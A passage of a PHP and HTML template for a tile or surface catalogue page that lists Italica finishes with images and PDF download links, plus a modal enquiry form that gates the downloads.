color-blue"> <b>I ROK Full Body </b> </h6> <p style="margin-top: 10px; font-size:15px;"><span class="qodef-icon-font-awesome fa fa-download color-blue"></span> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a class="qodef--underline-on-hover" href="img/catalogue/finish/Italica_I_ROK_Full_Body_Finish.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <b>PDF Download </b></a> </p> </div> </div> </div> </div> </div> </div> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-40 elementor-top-column elementor-element elementor-element-fa70e4f pr-5" data-id="fa70e4f" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="qodef-shortcode qodef-m qodef-video-button qodef--has-img"> <div class="qodef-shortcode qodef-m qodef-single-image qodef-layout--default qodef--has-appear"> <div class="qodef-m-image"> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a href="img/catalogue/finish/Italica_Infinia_+_Polished_Finish.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <img decoding="async" width="1001" height="658" src="img/catalogue/finish/Italica_Infinia_+_Polished_Finish.jpg" class="attachment-full size-full" alt="catalogue" title="catalogue" style="border:1px solid #bcbcbc;"/><br> </a> </div> </div> </div> <div class="elementor-element elementor-element-5a6e4ce elementor-widget elementor-widget-hiroshi_core_section_title" data-id="5a6e4ce" data-element_type="widget" data-widget_type="hiroshi_core_section_title.default"> <div class="elementor-widget-container"> <div class="qodef-shortcode qodef-m qodef-section-title qodef-alignment--left"> <h6 class="qodef-m-title color-blue"> <b>Infinia + Polished </b> </h6> <p style="margin-top: 10px; font-size:15px;"><span class="qodef-icon-font-awesome fa fa-download color-blue"></span> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a class="qodef--underline-on-hover" href="img/catalogue/finish/Italica_Infinia_+_Polished_Finish.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <b>PDF Download </b></a> </p> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-40 elementor-top-column elementor-element elementor-element-fa70e4f pr-5" data-id="fa70e4f" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="qodef-shortcode qodef-m qodef-video-button qodef--has-img"> <div class="qodef-shortcode qodef-m qodef-single-image qodef-layout--default qodef--has-appear"> <div class="qodef-m-image"> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a href="img/catalogue/finish/Italica_Matt_+_Infinia_Matt_Finish.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <img decoding="async" width="1001" height="658" src="img/catalogue/finish/Italica_Matt_+_Infinia_Matt_Finish.jpg" class="attachment-full size-full" alt="catalogue" title="catalogue" style="border:1px solid #bcbcbc;"/><br> </a> </div> </div> </div> <div class="elementor-element elementor-element-5a6e4ce elementor-widget elementor-widget-hiroshi_core_section_title" data-id="5a6e4ce" data-element_type="widget" data-widget_type="hiroshi_core_section_title.default"> <div class="elementor-widget-container"> <div class="qodef-shortcode qodef-m qodef-section-title qodef-alignment--left"> <h6 class="qodef-m-title color-blue"> <b>Matt + Infinia Matt </b> </h6> <p style="margin-top: 10px; font-size:15px;"><span class="qodef-icon-font-awesome fa fa-download color-blue"></span> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a class="qodef--underline-on-hover" href="img/catalogue/finish/Italica_Matt_+_Infinia_Matt_Finish.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <b>PDF Download </b></a> </p> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-40 elementor-top-column elementor-element elementor-element-fa70e4f pr-5" data-id="fa70e4f" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="qodef-shortcode qodef-m qodef-video-button qodef--has-img"> <div class="qodef-shortcode qodef-m qodef-single-image qodef-layout--default qodef--has-appear"> <div class="qodef-m-image"> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a href="img/catalogue/finish/Italica_Metox_Finish.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <img decoding="async" width="1001" height="658" src="img/catalogue/finish/Italica_Metox_Finish.jpg" class="attachment-full size-full" alt="catalogue" title="catalogue" style="border:1px solid #bcbcbc;"/><br> </a> </div> </div> </div> <div class="elementor-element elementor-element-5a6e4ce elementor-widget elementor-widget-hiroshi_core_section_title" data-id="5a6e4ce" data-element_type="widget" data-widget_type="hiroshi_core_section_title.default"> <div class="elementor-widget-container"> <div class="qodef-shortcode qodef-m qodef-section-title qodef-alignment--left"> <h6 class="qodef-m-title color-blue"> <b>Metox </b> </h6> <p style="margin-top: 10px; font-size:15px;"><span class="qodef-icon-font-awesome fa fa-download color-blue"></span> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a class="qodef--underline-on-hover" href="img/catalogue/finish/Italica_Metox_Finish.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <b>PDF Download </b></a> </p> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-40 elementor-top-column elementor-element elementor-element-fa70e4f pr-5" data-id="fa70e4f" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="qodef-shortcode qodef-m qodef-video-button qodef--has-img"> <div class="qodef-shortcode qodef-m qodef-single-image qodef-layout--default qodef--has-appear"> <div class="qodef-m-image"> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a href="img/catalogue/finish/Italica_Nutech_Finish.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <img decoding="async" width="1001" height="658" src="img/catalogue/finish/Italica_Nutech_Finish.jpg" class="attachment-full size-full" alt="catalogue" title="catalogue" style="border:1px solid #bcbcbc;"/><br> </a> </div> </div> </div> <div class="elementor-element elementor-element-5a6e4ce elementor-widget elementor-widget-hiroshi_core_section_title" data-id="5a6e4ce" data-element_type="widget" data-widget_type="hiroshi_core_section_title.default"> <div class="elementor-widget-container"> <div class="qodef-shortcode qodef-m qodef-section-title qodef-alignment--left"> <h6 class="qodef-m-title color-blue"> <b>Nutech </b> </h6> <p style="margin-top: 10px; font-size:15px;"><span class="qodef-icon-font-awesome fa fa-download color-blue"></span> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a class="qodef--underline-on-hover" href="img/catalogue/finish/Italica_Nutech_Finish.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <b>PDF Download </b></a> </p> </div> </div> </div> </div> </div> </div> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-40 elementor-top-column elementor-element elementor-element-fa70e4f pr-5" data-id="fa70e4f" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="qodef-shortcode qodef-m qodef-video-button qodef--has-img"> <div class="qodef-shortcode qodef-m qodef-single-image qodef-layout--default qodef--has-appear"> <div class="qodef-m-image"> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a href="img/catalogue/finish/Italica_Pigmento_Finish.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <img decoding="async" width="1001" height="658" src="img/catalogue/finish/Italica_Pigmento_Finish.jpg" class="attachment-full size-full" alt="catalogue" title="catalogue" style="border:1px solid #bcbcbc;"/><br> </a> </div> </div> </div> <div class="elementor-element elementor-element-5a6e4ce elementor-widget elementor-widget-hiroshi_core_section_title" data-id="5a6e4ce" data-element_type="widget" data-widget_type="hiroshi_core_section_title.default"> <div class="elementor-widget-container"> <div class="qodef-shortcode qodef-m qodef-section-title qodef-alignment--left"> <h6 class="qodef-m-title color-blue"> <b>Pigmento </b> </h6> <p style="margin-top: 10px; font-size:15px;"><span class="qodef-icon-font-awesome fa fa-download color-blue"></span> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a class="qodef--underline-on-hover" href="img/catalogue/finish/Italica_Pigmento_Finish.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <b>PDF Download </b></a> </p> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-40 elementor-top-column elementor-element elementor-element-fa70e4f pr-5" data-id="fa70e4f" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="qodef-shortcode qodef-m qodef-video-button qodef--has-img"> <div class="qodef-shortcode qodef-m qodef-single-image qodef-layout--default qodef--has-appear"> <div class="qodef-m-image"> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a href="img/catalogue/finish/Italica_Satin_Finish.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <img decoding="async" width="1001" height="658" src="img/catalogue/finish/Italica_Satin_Finish.jpg" class="attachment-full size-full" alt="catalogue" title="catalogue" style="border:1px solid #bcbcbc;"/><br> </a> </div> </div> </div> <div class="elementor-element elementor-element-5a6e4ce elementor-widget elementor-widget-hiroshi_core_section_title" data-id="5a6e4ce" data-element_type="widget" data-widget_type="hiroshi_core_section_title.default"> <div class="elementor-widget-container"> <div class="qodef-shortcode qodef-m qodef-section-title qodef-alignment--left"> <h6 class="qodef-m-title color-blue"> <b>Satin </b> </h6> <p style="margin-top: 10px; font-size:15px;"><span class="qodef-icon-font-awesome fa fa-download color-blue"></span> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a class="qodef--underline-on-hover" href="img/catalogue/finish/Italica_Satin_Finish.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <b>PDF Download </b></a> </p> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-40 elementor-top-column elementor-element elementor-element-fa70e4f pr-5" data-id="fa70e4f" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="qodef-shortcode qodef-m qodef-video-button qodef--has-img"> <div class="qodef-shortcode qodef-m qodef-single-image qodef-layout--default qodef--has-appear"> <div class="qodef-m-image"> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a href="img/catalogue/finish/Italica_Stonelo_Finish.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <img decoding="async" width="1001" height="658" src="img/catalogue/finish/Italica_Stonelo_Finish.jpg" class="attachment-full size-full" alt="catalogue" title="catalogue" style="border:1px solid #bcbcbc;"/><br> </a> </div> </div> </div> <div class="elementor-element elementor-element-5a6e4ce elementor-widget elementor-widget-hiroshi_core_section_title" data-id="5a6e4ce" data-element_type="widget" data-widget_type="hiroshi_core_section_title.default"> <div class="elementor-widget-container"> <div class="qodef-shortcode qodef-m qodef-section-title qodef-alignment--left"> <h6 class="qodef-m-title color-blue"> <b>Stonelo </b> </h6> <p style="margin-top: 10px; font-size:15px;"><span class="qodef-icon-font-awesome fa fa-download color-blue"></span> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a class="qodef--underline-on-hover" href="img/catalogue/finish/Italica_Stonelo_Finish.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <b>PDF Download </b></a> </p> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-40 elementor-top-column elementor-element elementor-element-fa70e4f pr-5" data-id="fa70e4f" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="qodef-shortcode qodef-m qodef-video-button qodef--has-img"> <div class="qodef-shortcode qodef-m qodef-single-image qodef-layout--default qodef--has-appear"> <div class="qodef-m-image"> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a href="img/catalogue/finish/Italica_Textura_Finish.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <img decoding="async" width="1001" height="658" src="img/catalogue/finish/Italica_Textura_Finish.jpg" class="attachment-full size-full" alt="catalogue" title="catalogue" style="border:1px solid #bcbcbc;"/><br> </a> </div> </div> </div> <div class="elementor-element elementor-element-5a6e4ce elementor-widget elementor-widget-hiroshi_core_section_title" data-id="5a6e4ce" data-element_type="widget" data-widget_type="hiroshi_core_section_title.default"> <div class="elementor-widget-container"> <div class="qodef-shortcode qodef-m qodef-section-title qodef-alignment--left"> <h6 class="qodef-m-title color-blue"> <b>Textura </b> </h6> <p style="margin-top: 10px; font-size:15px;"><span class="qodef-icon-font-awesome fa fa-download color-blue"></span> <?php if($_SERVER['QUERY_STRING'] == "success") { ?> <a class="qodef--underline-on-hover" href="img/catalogue/finish/Italica_Textura_Finish.pdf" target="_blank"> <?php } else { ?> <a href="catalogue.php#modal-3"> <?php } ?> <b>PDF Download </b></a> </p> </div> </div> </div> </div> </div> </div> </section> </div> </div> </div> </main> </div> </div> <div id="modal-3" class="modalDialog"> <div> <a href="catalogue.php#close" title="Close" class="close">x</a> <?php $parameters = $_SERVER['QUERY_STRING']; if($parameters == "success") { echo "<span style='color: #269422; font-size: 16px;'>Your Enquiry has been Sent Successfully !!!</span><br>"; } ?> <h5>Fill form and Download Catalogue</h5><hr> <form method="post" action="php/download-enquiry.php" class="" id="enquiry"> <div class="qodef-contact-form"> <div class="qodef-grid qodef-layout--columns qodef-col-num--2"> <div class="qodef-grid-inner"> <div class="qodef-grid-item"> <span class="wpcf7-form-control-wrap"> <input placeholder="Name*" type="text" name="name" id="name" required pattern=".*\S+.*" /> </span> <input type="text" name="hidden-input" id="hidden-input" style="display:none;" /> </div> <div class="qodef-grid-item"> <span class="wpcf7-form-control-wrap"> <input placeholder="Email*" type="email" id="email" name="email" required pattern=".*\S+.*" /> </span> </div> </div> </div> <div class="qodef-grid qodef-layout--columns qodef-col-num--2"> <div class="qodef-grid-inner"> <div class="qodef-grid-item"> <span class="wpcf7-form-control-wrap"> <input placeholder="Phone*" type="text" name="phone" id="phone" required pattern=".*\S+.*" /> </span> </div> <div class="qodef-grid-item"> <span class="wpcf7-form-control-wrap"> <input placeholder="Subject" type="text" name="sub" id="sub" required pattern=".*\S+.*" /> </span> </div> </div> </div> <span class="wpcf7-form-control-wrap" > <textarea cols="40" rows="5" placeholder="Message" name="message" id="message" required pattern=".*\S+.*" /></textarea> </span> <div class="g-recaptcha" data-sitekey="6LfGqsQqAAAAAM2uhvysh1KLFL3hv6t2eQqgcYGJ" data-callback="enableBtn"></div> <button class="" type="submit" name="submit" id="submit_form" disabled="disabled"> <span class="qodef-m-text">Send</span> </button> </div> </form> </div> </div> <script> $('#enquiry').submit(function() { $('#submit_form').addClass('disabled'); }); </script> <?php include "inc/footer.php";?>
Close